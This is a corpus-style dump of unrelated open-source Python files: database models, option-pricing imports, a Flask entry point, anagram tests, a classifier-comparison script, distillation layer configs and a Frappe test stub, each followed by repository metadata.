isLocked = Column(Integer, nullable=False)
class AlmanacDeviceTransaction(Base):
__tablename__ = 'almanac_devicetransaction'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
authorPHID = Column(String, nullable=False)
objectPHID = Column(String, nullable=False, index=True)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
commentPHID = Column(String)
commentVersion = Column(Integer, nullable=False)
transactionType = Column(Unicode(32), nullable=False)
oldValue = Column(Unicode, nullable=False)
newValue = Column(Unicode, nullable=False)
contentSource = Column(Unicode, nullable=False)
usermetadata = Column('metadata', Unicode, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacInterface(Base):
__tablename__ = 'almanac_interface'
__table_args__ = (
Index('key_location', 'networkPHID', 'address', 'port'),
)
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
devicePHID = Column(String, nullable=False, index=True)
networkPHID = Column(String, nullable=False)
address = Column(Unicode(64), nullable=False)
port = Column(Integer, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacNetwork(Base):
__tablename__ = 'almanac_network'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
name = Column(Unicode(128), nullable=False)
mailKey = Column(BINARY(20), nullable=False)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacNetworkTransaction(Base):
__tablename__ = 'almanac_networktransaction'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
authorPHID = Column(String, nullable=False)
objectPHID = Column(String, nullable=False, index=True)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
commentPHID = Column(String)
commentVersion = Column(Integer, nullable=False)
transactionType = Column(Unicode(32), nullable=False)
oldValue = Column(Unicode, nullable=False)
newValue = Column(Unicode, nullable=False)
contentSource = Column(Unicode, nullable=False)
usermetadata = Column('metadata', Unicode, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class AlmanacProperty(Base):
__tablename__ = 'almanac_property'
__table_args__ = (
Index('objectPHID', 'objectPHID', 'fieldIndex', unique=True),
)
id = Column(Integer, primary_key=True)
objectPHID = Column(String, nullable=False)
fieldIndex = Column(BINARY(12), nullable=False)
fieldName = Column(Unicode(128), nullable=False)
fieldValue = Column(Unicode, nullable=False)
class AlmanacService(Base):
__tablename__ = 'almanac_service'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
name = Column(Unicode(128), nullable=False, index=True)
nameIndex = Column(BINARY(12), nullable=False, unique=True)
mailKey = Column(BINARY(20), nullable=False)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
serviceClass = Column(Unicode(64), nullable=False, index=True)
isLocked = Column(Integer, nullable=False)
class AlmanacServiceTransaction(Base):
__tablename__ = 'almanac_servicetransaction'
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
authorPHID = Column(String, nullable=False)
objectPHID = Column(String, nullable=False, index=True)
viewPolicy = Column(String, nullable=False)
editPolicy = Column(String, nullable=False)
commentPHID = Column(String)
commentVersion = Column(Integer, nullable=False)
transactionType = Column(Unicode(32), nullable=False)
oldValue = Column(Unicode, nullable=False)
newValue = Column(Unicode, nullable=False)
contentSource = Column(Unicode, nullable=False)
usermetadata = Column('metadata', Unicode, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class Edge(Base):
__tablename__ = 'edge'
__table_args__ = (
Index('key_dst', 'dst', 'type', 'src', unique=True),
Index('src', 'src', 'type', 'dateCreated', 'seq')
)
src = Column(String, primary_key=True, nullable=False)
type = Column(Integer, primary_key=True, nullable=False)
dst = Column(String, primary_key=True, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
seq = Column(Integer, nullable=False)
dataID = Column(Integer)
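# Minimal usage sketch for the models above (an assumption: any SQLAlchemy
# engine URL works; the in-memory SQLite engine is just for illustration):
#
# from sqlalchemy import create_engine
# from sqlalchemy.orm import sessionmaker
#
# engine = create_engine('sqlite://')
# Base.metadata.create_all(engine)
# session = sessionmaker(bind=engine)()
# unlocked = session.query(AlmanacDevice).filter_by(isLocked=0).all()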
class EdgeData(Base):
__tablename__ = 'edgedata'
id = Column(Integer, primary_key=True)
data = Column(Unicode, nullable=False) | 38.218905 | 74 | 0.725592 | 815 | 7,682 | 6.720245 | 0.117791 | 0.242103 | 0.13511 | 0.168888 | 0.759357 | 0.725215 | 0.700201 | 0.658024 | 0.649078 | 0.649078 | 0 | 0.006072 | 0.16389 | 7,682 | 201 | 75 | 38.218905 | 0.846645 | 0.001692 | 0 | 0.648148 | 0 | 0 | 0.049426 | 0.013432 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030864 | 0 | 0.932099 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
b96f426a6ae42e4c0b4655f6fc92d2934b6a94e1 | 269 | py | Python | fypy/model/levy/__init__.py | jkirkby3/fypy | 28654800c91683685aee559aac13a17e3f4583b8 | [
"MIT"
] | 16 | 2021-04-24T18:51:00.000Z | 2022-03-31T16:17:21.000Z | fypy/model/levy/__init__.py | jkirkby3/fypy | 28654800c91683685aee559aac13a17e3f4583b8 | [
"MIT"
] | null | null | null | fypy/model/levy/__init__.py | jkirkby3/fypy | 28654800c91683685aee559aac13a17e3f4583b8 | [
"MIT"
] | 6 | 2021-04-28T12:19:25.000Z | 2022-03-31T16:19:36.000Z | from fypy.model.levy.VarianceGamma import VarianceGamma
from fypy.model.levy.BlackScholes import BlackScholes
from fypy.model.levy.CGMY import CMGY
from fypy.model.levy.KouJD import KouJD
from fypy.model.levy.MertonJD import MertonJD
from fypy.model.levy.NIG import NIG | 44.833333 | 55 | 0.847584 | 42 | 269 | 5.428571 | 0.285714 | 0.210526 | 0.342105 | 0.447368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085502 | 269 | 6 | 56 | 44.833333 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b99b3b090aecd6be059ff180811e82f558bfa672 | 146 | py | Python | wsgi.py | Luffky/INFOX | c3827e460e17840606ced61ddea1be81907df207 | [
"MIT"
] | 3 | 2020-03-08T18:19:19.000Z | 2022-03-31T20:15:55.000Z | wsgi.py | Luffky/INFOX | c3827e460e17840606ced61ddea1be81907df207 | [
"MIT"
] | 3 | 2020-02-23T14:37:13.000Z | 2021-02-08T20:28:28.000Z | wsgi.py | Luffky/INFOX | c3827e460e17840606ced61ddea1be81907df207 | [
"MIT"
] | 3 | 2020-02-18T15:13:33.000Z | 2021-08-15T14:38:51.000Z | from flask import Flask
from app import create_app
CONFIGURE_MODE = "production"
# CONFIGURE_MODE = "default"
app = create_app(CONFIGURE_MODE)
| 16.222222 | 32 | 0.787671 | 20 | 146 | 5.5 | 0.45 | 0.354545 | 0.327273 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143836 | 146 | 8 | 33 | 18.25 | 0.88 | 0.178082 | 0 | 0 | 0 | 0 | 0.084746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b99c6b74fa7b9ffc247fc78d3a1a59045c7337ef | 1,787 | py | Python | challenges/fb_challenge/hard/test_hard.py | arsummers/python-data-structures-and-algorithms | 30a488bd1100d8edac3b7fda73f7d7d999c61bfc | [
"MIT"
] | null | null | null | challenges/fb_challenge/hard/test_hard.py | arsummers/python-data-structures-and-algorithms | 30a488bd1100d8edac3b7fda73f7d7d999c61bfc | [
"MIT"
] | 21 | 2019-07-08T22:01:38.000Z | 2019-08-29T05:36:26.000Z | challenges/fb_challenge/hard/test_hard.py | arsummers/python-data-structures-and-algorithms | 30a488bd1100d8edac3b7fda73f7d7d999c61bfc | [
"MIT"
] | 1 | 2019-07-11T07:45:57.000Z | 2019-07-11T07:45:57.000Z | import pytest
from hard import anagram, anagram_oneliner
def test_exists():
assert anagram
assert anagram_oneliner
def test_simple():
text = ['poke', 'ekop', 'kope', 'peok']
expected = ['poke']
actual = anagram(text)
assert expected == actual
def test_medium():
text = ['code', 'doce', 'frame', 'edoc', 'framer']
expected = ['code', 'frame', 'framer']
actual = anagram(text)
assert expected == actual
def test_harder():
text = ['duck', 'alice', 'ckud', 'ecila']
expected = ['alice', 'duck']
actual = anagram(text)
assert expected == actual
def test_base_case():
text = ['code', 'doce', 'frame', 'edoc', 'framer', 'famer']
expected = ['code', 'frame', 'framer']
actual = anagram(text)
assert expected == actual
def test_single():
text = ['python']
expected = ['python']
actual = anagram(text)
assert expected == actual
# TESTS FOR ONELINER
def test_simple_one():
text = ['poke', 'ekop', 'kope', 'peok']
expected = ['poke']
actual = anagram_oneliner(text)
assert expected == actual
def test_medium_one():
text = ['code', 'doce', 'frame', 'edoc', 'framer']
expected = ['code', 'frame', 'framer']
actual = anagram_oneliner(text)
assert expected == actual
def test_harder_one():
text = ['duck', 'alice', 'ckud', 'ecila']
expected = ['alice', 'duck']
actual = anagram_oneliner(text)
assert expected == actual
def test_base_case_one():
text = ['code', 'doce', 'frame', 'edoc', 'framer', 'famer']
expected = ['code', 'frame', 'framer']
actual = anagram_oneliner(text)
assert expected == actual
def test_single_one():
text = ['python']
expected = ['python']
actual = anagram_oneliner(text)
assert expected == actual
| 25.898551 | 63 | 0.612759 | 201 | 1,787 | 5.323383 | 0.18408 | 0.071963 | 0.168224 | 0.224299 | 0.863551 | 0.863551 | 0.784112 | 0.702804 | 0.629907 | 0.472897 | 0 | 0 | 0.216564 | 1,787 | 68 | 64 | 26.279412 | 0.764286 | 0.010073 | 0 | 0.727273 | 0 | 0 | 0.158461 | 0 | 0 | 0 | 0 | 0 | 0.218182 | 1 | 0.2 | false | 0 | 0.036364 | 0 | 0.236364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9c2a7a90d08513af70b7334644ba8ca915159a8 | 7,801 | py | Python | src/main.py | amalroy/tipr-first-assignment | 778d7f4de766d52af9141991a44faaba5d526b9a | [
"MIT"
] | null | null | null | src/main.py | amalroy/tipr-first-assignment | 778d7f4de766d52af9141991a44faaba5d526b9a | [
"MIT"
] | null | null | null | src/main.py | amalroy/tipr-first-assignment | 778d7f4de766d52af9141991a44faaba5d526b9a | [
"MIT"
] | null | null | null | import argparse
import numpy as np
from numpy import genfromtxt
from sklearn.model_selection import KFold
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.preprocessing import normalize
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import f1_score
from sklearn.metrics import accuracy_score
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import lsh
import bayes
import projections
import nn
def reduce_dim(X,loc):
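# randomly project X down to d = 2, 4, 8, ... (up to ceil(k/2)) dimensions and
# save each reduced matrix to '<loc>/X_dim_<d>.csv'; the red==1 branch under
# __main__ below reads these files back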
k=X.shape[1]
d=2
while(d<=int(np.ceil(k/2))):
fname=loc+'/X_dim_'+str(d)+'.csv'
X_red=projections.random_proj(X,d)
np.savetxt(fname,X_red,delimiter=' ')
d=d*2
count_vect = CountVectorizer()
parser = argparse.ArgumentParser()
parser.add_argument('--test-data')
parser.add_argument('--test-label')
parser.add_argument('--dataset')
parser.add_argument('--mode')
args=parser.parse_args()
discrete=False
if (args.dataset=='twitter'):
discrete=True
with open(args.test_data) as file:
tweets=file.readlines()
X=count_vect.fit_transform(tweets)
y=genfromtxt(args.test_label,delimiter=' ')
else:
X=genfromtxt(args.test_data,delimiter=' ')
y=genfromtxt(args.test_label,delimiter=' ')
X=normalize(X)
def bayes_train_test(X,y):
n_splits=3
kf = KFold(n_splits,shuffle=True)
kf.get_n_splits(X)
accuracy=[]
f1_macro=[]
f1_micro=[]
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
y_pred=bayes.predict(X_test,X_train,y_train)
accuracy.append(accuracy_score(y_test,y_pred))
f1_macro.append(f1_score(y_test,y_pred,average='macro'))
f1_micro.append(f1_score(y_test,y_pred,average='micro'))
acc=np.mean(np.asarray(accuracy))
f1_ma=np.mean(np.asarray(f1_macro))
f1_mi=np.mean(np.asarray(f1_micro))
print("Test accuracy ::",acc)
print("Test macro F1 Score ::",f1_ma)
print("Test micro F1 Score ::",f1_mi)
return acc,f1_ma,f1_mi
def knn_train_test(X,y,k):
n_splits=10
kf = KFold(n_splits,shuffle=True)
kf.get_n_splits(X)
accuracy=[]
f1_macro=[]
f1_micro=[]
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
y_pred=nn.cluster_knn(X_test,X_train,y_train,k)
accuracy.append(accuracy_score(y_test,y_pred))
f1_macro.append(f1_score(y_test,y_pred,average='macro'))
f1_micro.append(f1_score(y_test,y_pred,average='micro'))
acc=np.mean(np.asarray(accuracy))
f1_ma=np.mean(np.asarray(f1_macro))
f1_mi=np.mean(np.asarray(f1_micro))
print("Test accuracy ::",acc)
print("Test macro F1 Score ::",f1_ma)
print("Test micro F1 Score ::",f1_mi)
return acc,f1_ma,f1_mi
def bayes_sklearn(X,y):
n_splits=10
kf = KFold(n_splits,shuffle=True)
kf.get_n_splits(X)
accuracy=[]
f1_macro=[]
f1_micro=[]
clf = GaussianNB()
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
clf.fit(X_train, y_train)
y_pred=clf.predict(X_test)
accuracy.append(accuracy_score(y_test,y_pred))
f1_macro.append(f1_score(y_test,y_pred,average='macro'))
f1_micro.append(f1_score(y_test,y_pred,average='micro'))
acc=np.mean(np.asarray(accuracy))
f1_ma=np.mean(np.asarray(f1_macro))
f1_mi=np.mean(np.asarray(f1_micro))
print("Test accuracy ::",acc)
print("Test macro F1 Score ::",f1_ma)
print("Test micro F1 Score ::",f1_mi)
return acc,f1_ma,f1_mi
def knn(X,y,k):
n_splits=10
kf = KFold(n_splits,shuffle=True)
kf.get_n_splits(X)
accuracy=[]
f1_macro=[]
f1_micro=[]
clf = KNeighborsClassifier(n_neighbors=k)
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
clf.fit(X_train, y_train)
y_pred=clf.predict(X_test)
accuracy.append(accuracy_score(y_test,y_pred))
f1_macro.append(f1_score(y_test,y_pred,average='macro'))
f1_micro.append(f1_score(y_test,y_pred,average='micro'))
acc=np.mean(np.asarray(accuracy))
f1_ma=np.mean(np.asarray(f1_macro))
f1_mi=np.mean(np.asarray(f1_micro))
print("Test accuracy ::",acc)
print("Test macro F1 Score ::",f1_ma)
print("Test micro F1 Score ::",f1_mi)
return acc,f1_ma,f1_mi
if __name__ == '__main__':
red=0
find_pca=False
if(find_pca==True):
d=2
k=X.shape[1]
n_run=int(np.log2(k))-1
dims=np.zeros(n_run)
accuracy=np.zeros(n_run)
f1_macro=np.zeros(n_run)
f1_micro=np.zeros(n_run)
i=0
while(d<=int(np.ceil(k/2))):
pca=PCA(n_components=d, svd_solver='arpack')
X_red=pca.fit_transform(X)  # fit_transform projects X onto the first d principal components; fit() alone returns the estimator
X_red=normalize(X_red)
#acc,f1_ma,f1_mi=knn_train_test(X_red.toarray(),y,3)
acc,f1_ma,f1_mi=bayes_train_test(X_red,y)
#acc,f1_ma,f1_mi=bayes_sklearn(X.toarray(),y)
#acc,f1_ma,f1_mi=knn(X.toarray(),y,5)
accuracy[i]=acc
f1_macro[i]=f1_ma
f1_micro[i]=f1_mi
dims[i]=d
i=i+1
d=d*2
f=plt.figure()
plt.plot(dims,accuracy)
plt.xlabel('Dimension')
plt.ylabel('Accuracy')
plt.savefig('task_7_acc_bayes_'+args.dataset+'.png')
f=plt.figure()
plt.plot(dims,f1_macro)
plt.xlabel('Dimension')
plt.ylabel('f1-macro')
plt.savefig('task_7_f1_macro_bayes_'+args.dataset+'.png')
f=plt.figure()
plt.plot(dims,f1_micro)
plt.xlabel('Dimension')
plt.ylabel('f1-micro')
plt.savefig('task_7_f1_micro_bayes_'+args.dataset+'.png')
plt.show()
#bayes_train_test(X,y)
#print(X)
#reduce_dim(X,'../data/'+args.dataset)
#bayes_sklearn(X,y)
#knn(X,y,5)
#do computation on original matrix
if(red==0):
#run required classifier here
bayes_train_test(X,y)
#knn_train_test(X,y)
#bayes_sklearn(X,y)
#knn(X,y,5)
#do computation on reduced matrix
elif(red==1):
k=X.shape[1]
n_run=int(np.log2(k))-1
dims=np.zeros(n_run)
accuracy=np.zeros(n_run)
f1_macro=np.zeros(n_run)
f1_micro=np.zeros(n_run)
#
loc='../data/'+args.dataset
d=2
i=0
while(d<=int(np.ceil(k/2))):
fname=loc+'/X_dim_'+str(d)+'.csv'
X_red=genfromtxt(fname,delimiter=' ')
y=genfromtxt(args.test_label,delimiter=' ')
X_red=normalize(X_red)  # normalize the reduced features before classification
#acc,f1_ma,f1_mi=knn_train_test(X_red.toarray(),y,3)
acc,f1_ma,f1_mi=bayes_train_test(X_red,y)
#acc,f1_ma,f1_mi=bayes_sklearn(X.toarray(),y)
#acc,f1_ma,f1_mi=knn(X.toarray(),y,5)
accuracy[i]=acc
f1_macro[i]=f1_ma
f1_micro[i]=f1_mi
dims[i]=d
i=i+1
d=d*2
f=plt.figure()
plt.plot(dims,accuracy)
plt.xlabel('Dimension')
plt.ylabel('Accuracy')
plt.savefig('task_3_acc_bayes_'+args.dataset+'.png')
f=plt.figure()
plt.plot(dims,f1_macro)
plt.xlabel('Dimension')
plt.ylabel('f1-macro')
plt.savefig('task_3_f1_macro_bayes_'+args.dataset+'.png')
f=plt.figure()
plt.plot(dims,f1_micro)
plt.xlabel('Dimension')
plt.ylabel('f1-micro')
plt.savefig('task_3_f1_micro_bayes_'+args.dataset+'.png')
plt.show()
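# Example invocation (the paths and dataset name below are assumptions):
# python main.py --test-data ../data/dolphins/X.csv --test-label ../data/dolphins/y.csv --dataset dolphins --mode bayes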
| 34.065502 | 65 | 0.631329 | 1,237 | 7,801 | 3.74131 | 0.118027 | 0.033276 | 0.020743 | 0.028522 | 0.753025 | 0.736819 | 0.722342 | 0.722342 | 0.708081 | 0.703544 | 0 | 0.024294 | 0.22433 | 7,801 | 228 | 66 | 34.214912 | 0.740539 | 0.063582 | 0 | 0.708134 | 0 | 0 | 0.085506 | 0.012078 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023923 | false | 0 | 0.076555 | 0 | 0.119617 | 0.057416 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9f789e247f4f654a54364db43aeb156677c622f | 6,950 | py | Python | generative/distill_matches.py | yzhhome/JDQA | 68e1d0259d316b3577a1f2fafa773b50f1885762 | [
"MIT"
] | 1 | 2021-12-21T10:50:21.000Z | 2021-12-21T10:50:21.000Z | generative/distill_matches.py | kalanile/JDQA | 68e1d0259d316b3577a1f2fafa773b50f1885762 | [
"MIT"
] | null | null | null | generative/distill_matches.py | kalanile/JDQA | 68e1d0259d316b3577a1f2fafa773b50f1885762 | [
"MIT"
] | 1 | 2021-12-21T10:50:20.000Z | 2021-12-21T10:50:20.000Z | '''
@Author: dengzaiyong
@Date: 2021-09-21 15:16:08
@LastEditTime: 2021-09-27 19:37:08
@LastEditors: dengzaiyong
@Desciption: Define layer matches and losses for knowledge distillation
@FilePath: /JDQA/generative/distill_matches.py
'''
L3_attention_mse=[{"layer_T":4, "layer_S":1, "feature":"attention", "loss":"attention_mse", "weight":1},
{"layer_T":8, "layer_S":2, "feature":"attention", "loss":"attention_mse", "weight":1},
{"layer_T":12, "layer_S":3, "feature":"attention", "loss":"attention_mse", "weight":1}]
L3_attention_ce=[{"layer_T":4, "layer_S":1, "feature":"attention", "loss":"attention_ce", "weight":1},
{"layer_T":8, "layer_S":2, "feature":"attention", "loss":"attention_ce", "weight":1},
{"layer_T":12, "layer_S":3, "feature":"attention", "loss":"attention_ce", "weight":1}]
L3_attention_mse_sum=[{"layer_T":4, "layer_S":1, "feature":"attention", "loss":"attention_mse_sum", "weight":1},
{"layer_T":8, "layer_S":2, "feature":"attention", "loss":"attention_mse_sum", "weight":1},
{"layer_T":12, "layer_S":3, "feature":"attention", "loss":"attention_mse_sum", "weight":1}]
L3_attention_ce_mean=[{"layer_T":4, "layer_S":1, "feature":"attention", "loss":"attention_ce_mean", "weight":1},
{"layer_T":8, "layer_S":2, "feature":"attention", "loss":"attention_ce_mean", "weight":1},
{"layer_T":12, "layer_S":3, "feature":"attention", "loss":"attention_ce_mean", "weight":1}]
L3_hidden_smmd=[{"layer_T":[0,0], "layer_S":[0,0], "feature":"hidden", "loss":"mmd", "weight":1},
{"layer_T":[4,4], "layer_S":[1,1], "feature":"hidden", "loss":"mmd", "weight":1},
{"layer_T":[8,8], "layer_S":[2,2], "feature":"hidden", "loss":"mmd", "weight":1},
{"layer_T":[12,12],"layer_S":[3,3], "feature":"hidden", "loss":"mmd", "weight":1}]
L3n_hidden_mse=[{"layer_T":0, "layer_S":0, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",384,768]},
{"layer_T":4, "layer_S":1, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",384,768]},
{"layer_T":8, "layer_S":2, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",384,768]},
{"layer_T":12,"layer_S":3, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",384,768]}]
L3_hidden_mse=[{"layer_T":0, "layer_S":0, "feature":"hidden", "loss":"hidden_mse", "weight":1},
{"layer_T":4, "layer_S":1, "feature":"hidden", "loss":"hidden_mse", "weight":1},
{"layer_T":8, "layer_S":2, "feature":"hidden", "loss":"hidden_mse", "weight":1},
{"layer_T":12,"layer_S":3, "feature":"hidden", "loss":"hidden_mse", "weight":1}]
L3l_hidden_mse=[{"layer_T":0, "layer_S":0, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",1024,768]},
{"layer_T":4, "layer_S":1, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",1024,768]},
{"layer_T":8, "layer_S":2, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",1024,768]},
{"layer_T":12,"layer_S":3, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",1024,768]}]
L4_attention_mse = [{"layer_T": 3, "layer_S": 1, "feature": "attention", "loss": "attention_mse", "weight": 1},
{"layer_T": 6, "layer_S": 2, "feature": "attention", "loss": "attention_mse", "weight": 1},
{"layer_T": 9, "layer_S": 3, "feature": "attention", "loss": "attention_mse", "weight": 1},
{"layer_T": 12, "layer_S": 4, "feature": "attention", "loss": "attention_mse", "weight": 1}]
L4_attention_ce = [{"layer_T": 3, "layer_S": 1, "feature": "attention", "loss": "attention_ce","weight": 1},
{"layer_T": 6, "layer_S": 2, "feature": "attention", "loss": "attention_ce", "weight": 1},
{"layer_T": 9, "layer_S": 3, "feature": "attention", "loss": "attention_ce", "weight": 1},
{"layer_T": 12, "layer_S": 4, "feature": "attention", "loss": "attention_ce", "weight": 1}]
L4_attention_mse_sum = [{"layer_T": 3,"layer_S": 1,"feature": "attention","loss": "attention_mse_sum","weight": 1},
{"layer_T": 6,"layer_S": 2,"feature": "attention","loss": "attention_mse_sum","weight": 1},
{"layer_T": 9,"layer_S": 3,"feature": "attention","loss": "attention_mse_sum","weight": 1},
{"layer_T": 12,"layer_S": 4,"feature": "attention","loss": "attention_mse_sum","weight": 1}]
L4_attention_ce_mean = [{"layer_T": 3,"layer_S": 1,"feature": "attention","loss": "attention_ce_mean","weight": 1},
{"layer_T": 6,"layer_S": 2,"feature": "attention","loss": "attention_ce_mean","weight": 1},
{"layer_T": 9,"layer_S": 3,"feature": "attention","loss": "attention_ce_mean","weight": 1},
{"layer_T": 12,"layer_S": 4,"feature": "attention","loss": "attention_ce_mean","weight": 1}]
L4_hidden_smmd = [{"layer_T": [0, 0],"layer_S": [0, 0],"feature": "hidden","loss": "mmd","weight": 1},
{"layer_T": [3, 3],"layer_S": [1, 1],"feature": "hidden","loss": "mmd","weight": 1},
{"layer_T": [6, 6],"layer_S": [2, 2],"feature": "hidden","loss": "mmd","weight": 1},
{"layer_T": [9, 9],"layer_S": [3, 3],"feature": "hidden","loss": "mmd","weight": 1},
{"layer_T": [12, 12],"layer_S": [4, 4],"feature": "hidden","loss": "mmd","weight": 1}]
L4t_hidden_mse = [{"layer_T": 0,"layer_S": 0,"feature": "hidden","loss": "hidden_mse","weight": 1,"proj": ["linear", 312, 768]},
{"layer_T": 3,"layer_S": 1,"feature": "hidden","loss": "hidden_mse","weight": 1,"proj": ["linear", 312, 768]},
{"layer_T": 6,"layer_S": 2,"feature": "hidden","loss": "hidden_mse","weight": 1,"proj": ["linear", 312, 768]},
{"layer_T": 9,"layer_S": 3,"feature": "hidden","loss": "hidden_mse","weight": 1,"proj": ["linear", 312, 768]},
{"layer_T": 12,"layer_S": 4,"feature": "hidden","loss": "hidden_mse","weight": 1,"proj": ["linear", 312, 768]}]
matches = {
'L3_attention_mse': L3_attention_mse,
'L3_attention_mse_sum': L3_attention_mse_sum,
'L3_attention_ce': L3_attention_ce,
'L3_attention_ce_mean': L3_attention_ce_mean,
'L3n_hidden_mse': L3n_hidden_mse,
'L3_hidden_smmd': L3_hidden_smmd,
'L3_hidden_mse': L3_hidden_mse,
'L3l_hidden_mse': L3l_hidden_mse,
'L4_attention_mse': L4_attention_mse,
'L4_attention_mse_sum': L4_attention_mse_sum,
'L4_attention_ce': L4_attention_ce,
'L4_attention_ce_mean': L4_attention_ce_mean,
'L4t_hidden_mse': L4t_hidden_mse,
'L4_hidden_smmd': L4_hidden_smmd,
} | 74.731183 | 129 | 0.570504 | 949 | 6,950 | 3.899895 | 0.064278 | 0.087544 | 0.097271 | 0.105377 | 0.901918 | 0.859768 | 0.809241 | 0.790057 | 0.784383 | 0.784383 | 0 | 0.061376 | 0.184173 | 6,950 | 93 | 130 | 74.731183 | 0.591358 | 0.033237 | 0 | 0 | 0 | 0 | 0.453963 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a2c1a467b3ccd73ed73d38ea15d9acd9f6de16d | 159 | py | Python | robinhood/robinhood/doctype/robin_chapter_mapping/test_robin_chapter_mapping.py | nikhilponnuru/robinhood | 51270012e2776170b242dc16f0bab5e132d644f7 | [
"MIT"
] | 4 | 2021-12-14T03:23:30.000Z | 2022-03-13T12:30:54.000Z | robinhood/robinhood/doctype/robin_chapter_mapping/test_robin_chapter_mapping.py | nikhilponnuru/robinhood | 51270012e2776170b242dc16f0bab5e132d644f7 | [
"MIT"
] | 2 | 2022-01-11T11:16:42.000Z | 2022-01-18T06:48:01.000Z | robinhood/robinhood/doctype/robin_chapter_mapping/test_robin_chapter_mapping.py | nikhilponnuru/robinhood | 51270012e2776170b242dc16f0bab5e132d644f7 | [
"MIT"
] | 3 | 2021-11-30T12:36:27.000Z | 2022-02-25T10:31:59.000Z | # Copyright (c) 2021, zerodha and Contributors
# See license.txt
# import frappe
import unittest
class TestRobinChapterMapping(unittest.TestCase):
pass
